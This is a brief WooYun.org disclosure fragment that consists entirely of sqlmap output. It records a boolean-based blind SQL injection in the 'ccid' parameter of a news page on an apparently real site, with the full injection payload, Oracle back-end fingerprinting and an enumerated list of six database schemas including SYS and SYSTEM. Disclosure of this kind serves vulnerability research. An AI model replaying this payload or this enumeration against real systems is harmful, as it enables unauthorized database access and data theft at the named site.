WooYun.org

sqlmap identified the following injection points with a total of 97 HTTP(s) requ
ests:
---
Place: GET
Parameter: ccid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: c=sh_news_p&cid=1382685035004&pagename=shenhua/sh_news_p/sh_layout/
goShenhua/pictureLayout&ccid=1385712590227 AND 2495=2495
---
[12:55:55] [INFO] testing MySQL
[12:56:00] [WARNING] the back-end DBMS is not MySQL
[12:56:00] [INFO] testing Oracle
[12:56:03] [INFO] confirming Oracle
[12:56:05] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, Apache 2.4.7, JSP, JSP 2.1
back-end DBMS: Oracle
[12:56:05] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[12:56:05] [INFO] fetching database (schema) names
[12:56:05] [INFO] fetching number of databases
available databases [6]:
[*] CTXSYS
[*] DELIVERYUSER
[*] EXFSYS
[*] SYS
[*] SYSTEM
[*] XDB